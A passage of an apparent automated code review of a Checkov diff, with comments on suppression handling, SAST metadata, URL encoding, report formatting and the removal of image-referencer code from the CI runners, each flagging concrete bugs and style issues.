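Review bot: `get_expected_value` returns `ANY_VALUE`, so any `KmsKeyId` — including an AWS-managed key alias — satisfies a check whose name requires a customer managed key; either the value should be inspected (at least rejecting `alias/aws/` keys) or the name softened to "encrypted with KMS". Stylistically the file is out of step with the CognitoUnauthenticatedIdentities check added in this same diff: `__init__` and the getters lack return annotations, `categories` is a list where the sibling uses a tuple, and `List[str]` is used where the rest of the new code uses builtin generics; `def __init__(self) -> None:` and `def get_inspected_key(self) -> str:` would align it. `get_evaluated_keys` merely repeats `get_inspected_key` and can be dropped if the base class already derives evaluated keys from the inspected key.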
@@ -68,6 +69,10 @@ def pre_scan(self) -> None: self.bc_cloned_checks[source_incident_id].append(policy) continue resource_types = Registry._get_resource_types(converted_check['metadata']) + + if policy.get('category') == LICENSES_CATEGORY: + continue + check = self.platform_policy_parser.parse_raw_check(converted_check, resources_types=resource_types) check.severity = Severities[policy['severity']] check.bc_id = check.id diff --git a/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py b/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py index d3853f9e90b..dc3bbbc594c 100644 --- a/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py +++ b/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py @@ -22,6 +22,7 @@ class PolicyMetadataIntegration(BaseIntegrationFeature): def __init__(self, bc_integration: BcPlatformIntegration) -> None: super().__init__(bc_integration=bc_integration, order=0) self.check_metadata: dict[str, Any] = {} + self.sast_check_metadata: dict[str, Any] = {} self.bc_to_ckv_id_mapping: dict[str, str] = {} self.pc_to_ckv_id_mapping: dict[str, str] = {} self.ckv_id_to_source_incident_id_mapping: dict[str, str] = {} @@ -145,6 +146,8 @@ def _handle_public_metadata(self, check_metadata: dict[str, Any]) -> None: def _handle_customer_run_config(self, run_config: dict[str, Any]) -> None: self.check_metadata = run_config['policyMetadata'] for ckv_id, pol in self.check_metadata.items(): + if 'SAST' in ckv_id: + self.sast_check_metadata[ckv_id] = pol self.bc_to_ckv_id_mapping[pol['id']] = ckv_id if self.bc_integration.is_prisma_integration() and pol.get('pcPolicyId'): self.pc_to_ckv_id_mapping[pol['pcPolicyId']] = ckv_id 
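Review bot: The new `if policy.get('category') == LICENSES_CATEGORY: continue` sits after `converted_check` and `resource_types` have already been computed for the policy, so that work is wasted for every license policy; moving the guard to the top of the loop body, before the conversion, avoids it, assuming the cloned-check branch above does not need to see license policies. The skip is also silent — a debug log line naming the skipped policy ID would let operators see why a platform license policy is not enforced locally. The enclosing `pre_scan` loop starts outside the hunk.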
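Review bot: `if 'SAST' in ckv_id:` in `_handle_customer_run_config` is a substring test over the whole ID, so any future check ID that merely contains those letters would be classified as SAST metadata; a prefix test such as `ckv_id.startswith(<SAST_ID_PREFIX>)` (placeholder for whatever the SAST ID prefix is), or a test on the policy's own category/framework field, would be more precise. `sast_check_metadata` is populated alongside `check_metadata`, which still holds the same entries, so the new attribute in `__init__` deserves a comment stating that it is a filtered view, e.g. `# subset of check_metadata holding only SAST policies`.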
diff --git a/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py b/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py index 4758d3783fc..5f88dd3d91f 100644 --- a/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py +++ b/checkov/common/bridgecrew/integration_features/features/suppressions_integration.py @@ -1,9 +1,10 @@ from __future__ import annotations +import itertools import logging import re from itertools import groupby -from typing import TYPE_CHECKING, Pattern, Any +from typing import TYPE_CHECKING, Pattern, Any, Optional from checkov.common.bridgecrew.check_type import CheckType @@ -26,6 +27,7 @@ class SuppressionsIntegration(BaseIntegrationFeature): def __init__(self, bc_integration: BcPlatformIntegration) -> None: super().__init__(bc_integration=bc_integration, order=2) # must be after the custom policies integration + self.suppressions_v2: dict[str, list[dict[str, Any]]] = {} self.suppressions: dict[str, list[dict[str, Any]]] = {} # bcorgname_provider_timestamp (ex: companyxyz_aws_1234567891011) 
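Review bot: The import hunk adds `import itertools` next to the existing `from itertools import groupby`, and `Optional` to a module that already relies on `from __future__ import annotations` with builtin generics (`dict[str, list[dict[str, Any]]]` in the next hunk); unless both new names are used further down the file, they are dead imports, and where `Optional` is used the `X | None` form would match the file's style. Keeping a single itertools import form would also avoid two ways of reaching the same module.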
@@ -52,26 +54,56 @@ def pre_scan(self) -> None: return suppressions = self.bc_integration.customer_run_config_response.get('suppressions') + suppressions_v2 = self.bc_integration.customer_run_config_response.get('suppressionsV2') # currently just SAST for suppression in suppressions: + suppression['isV1'] = True if suppression['policyId'] in metadata_integration.bc_to_ckv_id_mapping: suppression['checkovPolicyId'] = metadata_integration.get_ckv_id_from_bc_id(suppression['policyId']) else: suppression['checkovPolicyId'] = suppression['policyId'] # custom policy + for suppression in suppressions_v2: + suppression['isV1'] = False + checkov_ids = [] + for policy_id in suppression['policyIds']: + if policy_id in metadata_integration.bc_to_ckv_id_mapping: + checkov_ids.append(metadata_integration.bc_to_ckv_id_mapping[policy_id]) + else: + checkov_ids.append(policy_id) # custom policy - not supported yet + suppression['checkovPolicyIds'] = checkov_ids + self._init_repo_regex() suppressions = sorted(suppressions, key=lambda s: s['checkovPolicyId']) # group and map by policy ID self.suppressions = {policy_id: list(sup) for policy_id, sup in groupby(suppressions, key=lambda s: s['checkovPolicyId'])} - logging.debug(f'Found {len(self.suppressions)} valid suppressions from the platform.') - logging.debug('The found suppression rules are:') + + # map suppressions v2 by checkov ID - because the policy IDs are arrays, we need to map each unique ID in each + # suppression's policy ID array to its suppressions + self.suppressions_v2 = SuppressionsIntegration.create_suppression_v2_policy_id_map(suppressions_v2) + + logging.debug('The found suppression v1 rules are:') logging.debug(self.suppressions) + logging.debug('The found suppression v2 rules are:') + logging.debug(self.suppressions_v2) + except Exception: self.integration_feature_failures = True logging.debug("Scanning without applying suppressions configured in the platform.", exc_info=True) + @staticmethod + def 
create_suppression_v2_policy_id_map(suppressions_v2: list[dict[str, Any]]) -> dict[str, list[dict[str, Any]]]: + checkov_id_map: dict[str, list[dict[str, Any]]] = {} + for suppression in suppressions_v2: + for checkov_id in suppression['checkovPolicyIds']: + if checkov_id in checkov_id_map: + checkov_id_map[checkov_id].append(suppression) + else: + checkov_id_map[checkov_id] = [suppression] + return checkov_id_map + def post_runner(self, scan_report: Report) -> None: self._apply_suppressions_to_report(scan_report) @@ -89,10 +121,13 @@ def _apply_suppressions_to_report(self, scan_report: Report) -> None: check.check_id = 'BC_VUL_1' relevant_suppressions = self.suppressions.get(check.check_id) + relevant_suppressions_v2 = self.suppressions_v2.get(check.check_id) + + has_suppression = relevant_suppressions or relevant_suppressions_v2 - applied_suppression = self._check_suppressions(check, relevant_suppressions) if relevant_suppressions else None + applied_suppression = self._check_suppressions(check, relevant_suppressions, relevant_suppressions_v2) if has_suppression else None if applied_suppression: - suppress_comment = applied_suppression['comment'] + suppress_comment = applied_suppression['comment'] if applied_suppression['isV1'] else applied_suppression['justificationComment'] logging.debug(f'Applying suppression to the check {check.check_id} with the comment: {suppress_comment}') check.check_result = { 'result': CheckResult.SKIPPED, 
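Review bot: `suppressions_v2 = self.bc_integration.customer_run_config_response.get('suppressionsV2')` in `pre_scan` is not guarded, so a run-config without that key yields `None` and `for suppression in suppressions_v2:` raises `TypeError`; the blanket `except Exception` then sets `integration_feature_failures` and the v1 suppressions parsed just above are dropped as well. Default it with `suppressions_v2 = self.bc_integration.customer_run_config_response.get('suppressionsV2') or []`. `pre_scan` starts outside the hunk.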
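Review bot: `applied_suppression['justificationComment']` in `_apply_suppressions_to_report` raises `KeyError` for a v2 suppression without that field, and `post_runner` as shown has no exception guard, so one malformed platform suppression would abort report post-processing for every check. Use `applied_suppression.get('justificationComment', '')`, and consider `has_suppression = bool(relevant_suppressions or relevant_suppressions_v2)` since the name reads as a flag but holds a list. The method continues outside the hunk.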
@@ -107,17 +142,19 @@ def _apply_suppressions_to_report(self, scan_report: Report) -> None: scan_report.failed_checks = still_failed_checks scan_report.passed_checks = still_passed_checks - def _check_suppressions(self, record: Record, suppressions: list[dict[str, Any]]) -> dict[str, Any] | None: + def _check_suppressions(self, record: Record, suppressions: Optional[list[dict[str, Any]]], suppressions_v2: Optional[list[dict[str, Any]]]) -> dict[str, Any] | None: """ - Checks the specified suppressions against the specified record, returning the first applicable suppression, - or None of no suppression is applicable. - :param record: - :param suppressions: + Checks the specified suppressions against the specified record, returning the applied suppression, if any, else None :return: """ - for suppression in suppressions: - if self._check_suppression(record, suppression): - return suppression + if suppressions: + for suppression in suppressions: + if self._check_suppression(record, suppression): + return suppression + if suppressions_v2: + for suppression in suppressions_v2: + if self._check_suppression_v2(record, suppression): + return suppression return None def _check_suppression(self, record: Record, suppression: dict[str, Any]) -> bool: 
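Review bot: The rewritten docstring of `_check_suppressions` drops the parameter descriptions and keeps an empty `:return:`; with a third list now accepted, the contract should be spelled out: `:param record: the check result being evaluated`, `:param suppressions: v1 suppressions mapped to this record's check id, checked first`, `:param suppressions_v2: v2 suppressions for the same id, checked only if no v1 rule applied`, `:return: the matching suppression dict, or None`. The signature also mixes `Optional[...]` parameters with a `| None` return type in one line; pick one form.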
@@ -189,6 +226,38 @@ def _check_suppression(self, record: Record, suppression: dict[str, Any]) -> boo return False + @staticmethod + def normalize_file_path(file_path: str) -> str: + """ + Returns the file path with a leading slash, if not already present + """ + return file_path if file_path.startswith('/') else f'/{file_path}' + + def _check_suppression_v2_file(self, record_file_path: str, suppression_file_path: str, suppression_repo_name: str) -> bool: + return self.bc_integration.repo_matches(suppression_repo_name)\ + and (suppression_file_path == record_file_path or suppression_file_path == convert_to_unix_path(record_file_path)) + + def _check_suppression_v2(self, record: Record, suppression: dict[str, Any]) -> bool: + if record.check_id not in suppression['checkovPolicyIds']: + return False + + type = suppression['ruleType'] + + if type == 'policy': + # We just checked the policy ID above + return True + elif type == 'finding': + pass # TODO how to map them? + elif type == 'file': + record_file_path = SuppressionsIntegration.normalize_file_path(record.repo_file_path) + for file_suppression in suppression['files']: + suppression_file_path = SuppressionsIntegration.normalize_file_path(file_suppression['filePath']) + if self._check_suppression_v2_file(record_file_path, suppression_file_path, file_suppression.get('repositoryName', '')): + return True + elif type == 'repository': + return any(self.bc_integration.repo_matches(repo.get('repositoryName', '')) for repo in suppression['repositories']) + return False + def _get_cve_suppression_path(self, suppression: dict[str, Any]) -> str: suppression_path: str = align_path(suppression['cves'][0]['id']) # for handling cases of IR/docker (e.g: '/Dockerfile:/DockerFile.FROM) 
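Review bot: `type = suppression['ruleType']` in `_check_suppression_v2` shadows the builtin; rename it `rule_type`. The `'finding'` branch is a bare `pass # TODO` that falls through to `return False`, so finding-scoped v2 suppressions are silently never applied — a `logging.debug(...)` there keeps that gap visible. In the `'repository'` and `'file'` branches, `repo.get('repositoryName', '')` feeds an empty string into `self.bc_integration.repo_matches`; if that helper treats `''` permissively, an entry without a repository name would suppress the finding in every repository, so confirm and skip empty names explicitly.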
@@ -231,12 +300,12 @@ def pre_runner(self, runner: _BaseRunner) -> None: # not used pass - def get_policy_level_suppressions(self) -> dict[str, str]: + def get_policy_level_suppressions(self) -> dict[str, list[str]]: policy_level_suppressions = {} - for check_suppressions in self.suppressions.values(): + for check_suppressions in itertools.chain(self.suppressions.values(), self.suppressions_v2.values()): for suppression in check_suppressions: - if suppression.get("suppressionType") == "Policy": - policy_level_suppressions[suppression['id']] = suppression['policyId'] + if (suppression['isV1'] and suppression.get("suppressionType") == "Policy") or (not suppression['isV1'] and suppression.get("ruleType") == "policy"): + policy_level_suppressions[suppression['id']] = [suppression['policyId']] if suppression['isV1'] else suppression['policyIds'] break return policy_level_suppressions diff --git a/checkov/common/bridgecrew/platform_integration.py b/checkov/common/bridgecrew/platform_integration.py index 19ae7da9925..8af6863a521 100644 --- a/checkov/common/bridgecrew/platform_integration.py +++ b/checkov/common/bridgecrew/platform_integration.py @@ -19,6 +19,7 @@ import boto3 import dpath import urllib3 +import urllib.parse from botocore.config import Config from botocore.exceptions import ClientError from cachetools import cached, TTLCache @@ -1415,6 +1416,12 @@ def get_sso_prismacloud_url(self, report_url: str) -> str: # If there are any query parameters, append them to the URI if parsed_url.query: uri = f"{uri}?{parsed_url.query}" + + # First encoding + encoded_uri = urllib.parse.quote(uri) + + # Second encoding + uri = urllib.parse.quote(encoded_uri) # Check if the URL already contains GET parameters. if "?" in access_saml_url: report_url = f"{access_saml_url}&{relay_state_param_name}={uri}" 
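Review bot: The condition in `get_policy_level_suppressions` now spans a v1 and a v2 clause on one line and is hard to scan; extracting `_is_policy_level(suppression) -> bool` that returns `suppression.get("suppressionType") == "Policy" if suppression['isV1'] else suppression.get("ruleType") == "policy"` and a matching helper for the id list would make the loop read as before. The pre-existing `break` still records only the first policy-level suppression per check list.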
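Review bot: The comments `# First encoding` / `# Second encoding` in `get_sso_prismacloud_url` describe what the two `urllib.parse.quote` calls do, not why a double pass is required; replace them with one comment stating which component percent-decodes the RelayState a second time, since a reader will otherwise "fix" the apparent duplication. Note also that `quote` leaves `/` unescaped by default (`safe='/'`), so if the receiving side expects a fully encoded relay state, pass `safe=''`. The method starts outside the hunk.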
diff --git a/checkov/common/graph/graph_builder/graph_components/attribute_names.py b/checkov/common/graph/graph_builder/graph_components/attribute_names.py index ed796ee0137..2439c8efa33 100644 --- a/checkov/common/graph/graph_builder/graph_components/attribute_names.py +++ b/checkov/common/graph/graph_builder/graph_components/attribute_names.py @@ -23,6 +23,7 @@ class CustomAttributes: ENCRYPTION = "encryption_" ENCRYPTION_DETAILS = "encryption_details_" TF_RESOURCE_ADDRESS = "__address__" + PROVIDER_ADDRESS = "__provider_address__" REFERENCES = "references_" FOREACH_ATTRS = "foreach_attrs_" SOURCE_MODULE_OBJECT = "source_module_object_" diff --git a/checkov/common/output/report.py b/checkov/common/output/report.py index b2aece61b15..1d46ec8ee4f 100644 --- a/checkov/common/output/report.py +++ b/checkov/common/output/report.py @@ -367,20 +367,30 @@ def print_failed_github_md(self, use_bc_ids: bool = False) -> str: result.append( [ record.get_output_id(use_bc_ids), - record.file_path, - record.resource, record.check_name, - record.guideline, + record.resource, + f"[Link]({record.guideline})", + record.file_path, ] ) if result: + summary = self.get_summary() + if self.parsing_errors: + message = "Passed Checks: {}, Failed Checks: {}, Skipped Checks: {}, Parsing Errors: {}\n\n".format( + summary["passed"], + summary["failed"], + summary["skipped"], + summary["parsing_errors"], + ) + else: + message = f"```\nPassed Checks: {summary['passed']}, Failed Checks: {summary['failed']}, Skipped Checks: {summary['skipped']}\n```\n\n" + table = tabulate( result, - headers=["check_id", "file", "resource", "check_name", "guideline"], + headers=["Check ID", "Check Name", "Resource", "Guideline", "File"], tablefmt="github", - showindex=True, ) - output_data = f"### {self.check_type} scan results:\n\n{table}\n\n---\n" + output_data = f"### {self.check_type.replace('_', ' ').title()} Scan Results:\n\n{message}{table}\n\n---\n" return output_data else: return "\n\n---\n\n" 
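Review bot: In `print_failed_github_md` the two `message` branches render differently: the parsing-errors variant is plain text while the other is wrapped in a ``` fence, so the summary line changes shape depending on whether parse errors occurred; wrap both the same way (and use one formatting style rather than `.format` in one branch and an f-string in the other). `f"[Link]({record.guideline})"` also renders `[Link](None)` when a record has no guideline; use `f"[Link]({record.guideline})" if record.guideline else ""`. The method starts outside the hunk.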
diff --git a/checkov/common/runners/object_runner.py b/checkov/common/runners/object_runner.py index a41397fa722..15eaba47e9c 100644 --- a/checkov/common/runners/object_runner.py +++ b/checkov/common/runners/object_runner.py @@ -123,13 +123,13 @@ def run( if self.graph_registry: self.graph_registry.load_external_checks(directory) + if root_folder: + self.root_folder = root_folder + if not self.context or not self.definitions: if files: self._load_files(files) - if root_folder: - self.root_folder = root_folder - for root, d_names, f_names in os.walk(root_folder): filter_ignored_paths(root, d_names, runner_filter.excluded_paths, self.included_paths()) filter_ignored_paths(root, f_names, runner_filter.excluded_paths, self.included_paths()) diff --git a/checkov/common/sast/consts.py b/checkov/common/sast/consts.py index b52d8a8609e..ee568dcbe7f 100644 --- a/checkov/common/sast/consts.py +++ b/checkov/common/sast/consts.py @@ -36,7 +36,6 @@ def set(cls) -> Set["CDKLanguages"]: PYTHON = 'python' TYPESCRIPT = 'typescript' - GOLANG = 'golang' class BqlVersion(str, Enum): diff --git a/checkov/common/util/env_vars_config.py b/checkov/common/util/env_vars_config.py index 96157ef1811..047a317b222 100644 --- a/checkov/common/util/env_vars_config.py +++ b/checkov/common/util/env_vars_config.py @@ -21,6 +21,7 @@ def __init__(self) -> None: self.CACHE_DIR = convert_str_to_bool(os.getenv("CKV_CACHE_DIR", str(Path(tempfile.gettempdir()) / "cache"))) self.CHECK_FAIL_LEVEL = os.getenv("CHECKOV_CHECK_FAIL_LEVEL", CheckFailLevel.ERROR) self.CREATE_COMPLEX_VERTICES = convert_str_to_bool(os.getenv("CREATE_COMPLEX_VERTICES", True)) + self.CHECKOV_ENABLE_DATAS_FOREACH_HANDLING = os.getenv('CHECKOV_ENABLE_DATAS_FOREACH_HANDLING', 'False') self.CREATE_EDGES = convert_str_to_bool(os.getenv("CREATE_EDGES", True)) self.CREATE_MARKDOWN_HYPERLINKS = convert_str_to_bool(os.getenv("CHECKOV_CREATE_MARKDOWN_HYPERLINKS", False)) self.CREATE_SCA_IMAGE_REPORTS_FOR_IR = convert_str_to_bool( 
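Review bot: `self.CHECKOV_ENABLE_DATAS_FOREACH_HANDLING = os.getenv('CHECKOV_ENABLE_DATAS_FOREACH_HANDLING', 'False')` in env_vars_config.py stores the raw string, unlike every neighbouring flag that goes through `convert_str_to_bool`; the default `'False'` is a non-empty string and therefore truthy, so any consumer that tests the attribute directly would have the feature on by default. Use `convert_str_to_bool(os.getenv("CHECKOV_ENABLE_DATAS_FOREACH_HANDLING", False))` and double quotes to match the siblings. The consumers are not in this diff, so the truthiness impact is inferred.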
diff --git a/checkov/common/util/type_forcers.py b/checkov/common/util/type_forcers.py index 371e53ba7cf..d663b56b49a 100644 --- a/checkov/common/util/type_forcers.py +++ b/checkov/common/util/type_forcers.py @@ -140,11 +140,10 @@ def convert_prisma_policy_filter_to_dict(filter_string: str) -> Dict[Any, Any]: """ filter_params = {} if isinstance(filter_string, str) and filter_string: - filter_string = "".join(filter_string.split()) - try: - for f in filter_string.split(','): + for f in filter_string.split(','): + try: f_name, f_value = f.split('=') - filter_params[f_name] = f_value - except (IndexError, ValueError) as e: - logging.debug(f"Invalid filter format: {e}") + filter_params[f_name.strip()] = f_value.strip() + except (IndexError, ValueError) as e: + logging.debug(f"Invalid filter format: {e}") return filter_params diff --git a/checkov/github_actions/image_referencer/__init__.py b/checkov/github_actions/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/checkov/github_actions/image_referencer/manager.py b/checkov/github_actions/image_referencer/manager.py deleted file mode 100644 index 822287da929..00000000000 --- a/checkov/github_actions/image_referencer/manager.py +++ /dev/null 
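Review bot: `f_name, f_value = f.split('=')` in `convert_prisma_policy_filter_to_dict` still raises `ValueError` for a value containing `=` (padded base64 or an encoded URL), which is then only logged and the filter dropped; `f.split('=', 1)` keeps the first `=` as the separator and accepts the rest as the value. With the per-item `try` a trailing comma now also logs an "Invalid filter format" line for the empty segment; skipping blanks with `if not f.strip(): continue` avoids the noise. The function starts outside the hunk.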
@@ -1,15 +0,0 @@ -from __future__ import annotations -from typing import Any - -from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager -from checkov.github_actions.image_referencer.provider import GithubActionProvider - - -class GithubActionsImageReferencerManager(WorkflowImageReferencerManager): - __slots__ = ("workflow_config", "file_path", "workflow_line_numbers", "provider") - - def __init__(self, workflow_config: dict[str, Any], file_path: str, workflow_line_numbers: list[tuple[int, str]]): - provider = GithubActionProvider(workflow_config=workflow_config, file_path=file_path, - workflow_line_numbers=workflow_line_numbers) - super().__init__(workflow_config, file_path, provider) - self.workflow_line_numbers = workflow_line_numbers diff --git a/checkov/github_actions/image_referencer/provider.py b/checkov/github_actions/image_referencer/provider.py deleted file mode 100644 index e2b4a8e04f8..00000000000 --- a/checkov/github_actions/image_referencer/provider.py +++ /dev/null 
@@ -1,66 +0,0 @@ -from __future__ import annotations -from typing import Any - -from checkov.common.images.image_referencer import Image -from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider -from checkov.common.util.consts import START_LINE, END_LINE - - -class GithubActionProvider(WorkflowImageReferencerProvider): - - def __init__(self, workflow_config: dict[str, Any], file_path: str, workflow_line_numbers: list[tuple[int, str]]): - super().__init__(workflow_config, file_path) - self.workflow_line_numbers = workflow_line_numbers - - def generate_resource_key(self, start_line: int, end_line: int) -> str: - """ - Generate resource key without the previous format of key (needed in get_resource) - """ - jobs_dict: dict[str, Any] = self.workflow_config.get("jobs", {}) - for job_name, job in jobs_dict.items(): - if not isinstance(job, dict): - continue - - if job[START_LINE] <= start_line <= end_line <= job[END_LINE]: - return f'jobs({job_name})' - - return '' - - def extract_images_from_workflow(self) -> list[Image]: - images: list[Image] = [] - - if not isinstance(self.workflow_config, dict): - # make type checking happy - return images - - jobs = self.workflow_config.get("jobs", {}) - for job_object in jobs.values(): - if isinstance(job_object, dict): - container = job_object.get("container", {}) - image = None - start_line = 0 - end_line = 0 - - if isinstance(container, dict): - image = container.get("image", "") - start_line, end_line = container.get(START_LINE, 0), container.get(END_LINE, 0) - elif isinstance(container, str): - image = container - line_to_line_numbers = self.workflow_line_numbers[job_object[START_LINE] - 1:] - image_line = next((line_number for line_number, line in line_to_line_numbers if image in line), None) - if not image_line: - continue - start_line = image_line - end_line = start_line + 1 - - if image: - image_obj = Image( - file_path=self.file_path[self.file_path.index('/.github'):], - 
name=image, - start_line=start_line, - end_line=end_line, - related_resource_id=self.generate_resource_key(start_line, end_line) - ) - images.append(image_obj) - - return images diff --git a/checkov/github_actions/runner.py b/checkov/github_actions/runner.py index c0d13304225..ce92b7466e7 100644 --- a/checkov/github_actions/runner.py +++ b/checkov/github_actions/runner.py @@ -1,25 +1,19 @@ from __future__ import annotations import logging -import os from collections.abc import Iterable from typing import TYPE_CHECKING, Any import yaml +import checkov.common.parsers.yaml.loader as loader +from checkov.common.bridgecrew.check_type import CheckType from checkov.common.graph.graph_builder.consts import GraphSource from checkov.common.output.report import Report -from checkov.github_actions.image_referencer.manager import GithubActionsImageReferencerManager +from checkov.github_actions.checks.registry import registry from checkov.github_actions.graph_builder.local_graph import GitHubActionsLocalGraph from checkov.github_actions.utils import is_schema_valid, is_workflow_file - from checkov.runner_filter import RunnerFilter - -import checkov.common.parsers.yaml.loader as loader -from checkov.common.images.image_referencer import Image, ImageReferencerMixin -from checkov.common.bridgecrew.check_type import CheckType -from checkov.common.util.type_forcers import force_dict -from checkov.github_actions.checks.registry import registry from checkov.yaml_doc.runner import Runner as YamlRunner if TYPE_CHECKING: @@ -27,10 +21,9 @@ from checkov.common.typing import LibraryGraphConnector from checkov.common.runners.graph_builder.local_graph import ObjectLocalGraph from checkov.common.runners.graph_manager import ObjectGraphManager - from networkx import DiGraph -class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner): +class Runner(YamlRunner): check_type = CheckType.GITHUB_ACTIONS # noqa: CCE003 # a static attribute def __init__( 
@@ -117,43 +110,8 @@ def run( runner_filter = runner_filter or RunnerFilter() report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir, files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments) - if runner_filter.run_image_referencer: - if files: - # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form - root_folder = os.path.split(os.path.commonprefix(files))[0] - - image_report = self.check_container_image_references( - graph_connector=None, - root_path=root_folder, - runner_filter=runner_filter, - definitions=self.definitions, - definitions_raw=self.definitions_raw - ) - - if image_report: - if isinstance(report, list): - return [*report, image_report] - return [report, image_report] - return report - def extract_images( - self, graph_connector: DiGraph | None = None, - definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None, - definitions_raw: dict[str, list[tuple[int, str]]] | None = None - ) -> list[Image]: - images: list[Image] = [] - if not definitions or not definitions_raw: - return images - - for file, config in definitions.items(): - _config = force_dict(config) or {} - manager = GithubActionsImageReferencerManager(workflow_config=_config, file_path=file, - workflow_line_numbers=definitions_raw[file]) - images.extend(manager.extract_images_from_workflow()) - - return images - def populate_metadata_dict(self) -> None: if isinstance(self.definitions, dict): # populate gha metadata dict diff --git a/checkov/gitlab_ci/image_referencer/__init__.py b/checkov/gitlab_ci/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/checkov/gitlab_ci/image_referencer/manager.py b/checkov/gitlab_ci/image_referencer/manager.py deleted file mode 100644 index 28abfd40ab1..00000000000 --- a/checkov/gitlab_ci/image_referencer/manager.py +++ /dev/null 
@@ -1,13 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager -from checkov.gitlab_ci.image_referencer.provider import GitlabCiProvider - - -class GitlabCiImageReferencerManager(WorkflowImageReferencerManager): - - def __init__(self, workflow_config: dict[str, Any], file_path: str): - provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) - super().__init__(workflow_config, file_path, provider) diff --git a/checkov/gitlab_ci/image_referencer/provider.py b/checkov/gitlab_ci/image_referencer/provider.py deleted file mode 100644 index 743ae81197f..00000000000 --- a/checkov/gitlab_ci/image_referencer/provider.py +++ /dev/null 
@@ -1,62 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.common.images.image_referencer import Image -from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider -from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive - - -class GitlabCiProvider(WorkflowImageReferencerProvider): - - def __init__(self, workflow_config: dict[str, Any], file_path: str): - super().__init__(workflow_config, file_path) - self.supported_keys = ("image", "services") - - def extract_images_from_workflow(self) -> list[Image]: - images = [] - for job_object in self.workflow_config.values(): - if isinstance(job_object, dict): - start_line, end_line = GitlabCiProvider._get_start_end_lines(job_object) - for key, subjob in job_object.items(): - if key in self.supported_keys: - image_name = "" - if isinstance(subjob, dict): - if 'name' not in subjob: - continue - start_line, end_line = GitlabCiProvider._get_start_end_lines(subjob) - image_name = subjob['name'] - elif isinstance(subjob, str): - image_name = subjob - elif isinstance(subjob, list): - for service in subjob: - if isinstance(service, dict): - start_line, end_line = GitlabCiProvider._get_start_end_lines(service) - image_name = service['name'] - elif isinstance(service, str): - image_name = service - if image_name: - image_obj = Image( - file_path=self.file_path, - name=image_name, - start_line=start_line, - end_line=end_line, - related_resource_id=generate_resource_key_recursive(conf=self.workflow_config, - key='', - start_line=start_line, - end_line=end_line) - ) - images.append(image_obj) - image_name = "" - if image_name: - image_obj = Image( - file_path=self.file_path, - name=image_name, - start_line=start_line, - end_line=end_line, - related_resource_id=generate_resource_key_recursive(conf=self.workflow_config, - key='', start_line=start_line, - end_line=end_line) - ) - images.append(image_obj) - return list(set(images)) 
diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py index a58acd9d179..d680383cbb4 100644 --- a/checkov/gitlab_ci/runner.py +++ b/checkov/gitlab_ci/runner.py @@ -1,27 +1,21 @@ from __future__ import annotations -import os from typing import TYPE_CHECKING, Any +from checkov.common.bridgecrew.check_type import CheckType from checkov.common.output.report import Report from checkov.common.util.type_forcers import force_dict +from checkov.gitlab_ci.checks.registry import registry from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive - from checkov.runner_filter import RunnerFilter - -from checkov.common.images.image_referencer import Image, ImageReferencerMixin -from checkov.common.bridgecrew.check_type import CheckType -from checkov.gitlab_ci.checks.registry import registry -from checkov.gitlab_ci.image_referencer.manager import GitlabCiImageReferencerManager from checkov.yaml_doc.runner import Runner as YamlRunner if TYPE_CHECKING: from checkov.common.checks.base_check_registry import BaseCheckRegistry from collections.abc import Iterable - from networkx import DiGraph -class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner): +class Runner(YamlRunner): check_type = CheckType.GITLAB_CI # noqa: CCE003 # a static attribute def require_external_checks(self) -> bool: 
@@ -69,38 +63,4 @@ def run( runner_filter = runner_filter or RunnerFilter() report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir, files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments) - if runner_filter.run_image_referencer: - if files: - # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form - root_folder = os.path.split(os.path.commonprefix(files))[0] - - image_report = self.check_container_image_references( - graph_connector=None, - root_path=root_folder, - runner_filter=runner_filter, - definitions=self.definitions - ) - - if image_report: - return [report, image_report] # type:ignore[list-item] # report can only be of type Report, not a list - return report - - def extract_images( - self, - graph_connector: DiGraph | None = None, - definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None, - definitions_raw: dict[str, list[tuple[int, str]]] | None = None - ) -> list[Image]: - images: list[Image] = [] - if not definitions: - return images - - for file, config in definitions.items(): - if isinstance(config, list): - continue - - manager = GitlabCiImageReferencerManager(workflow_config=config, file_path=file) - images.extend(manager.extract_images_from_workflow()) - - return images diff --git a/checkov/runner_filter.py b/checkov/runner_filter.py index 0661b39aa54..83911694936 100644 --- a/checkov/runner_filter.py +++ b/checkov/runner_filter.py 
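Review bot: The hunk removes `return report` from `run` in gitlab_ci/runner.py along with the image-referencer block and adds no replacement, so as far as the hunk shows the method now falls off the end and returns `None`, discarding the scan results; the counterpart in github_actions/runner.py keeps its `return report`. Restore `return report` after the `super().run(...)` call. The line counts (`-69,38 +63,4`) are consistent with the removal, but the collapsed layout makes the exact context lines hard to read, so confirm against the file.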
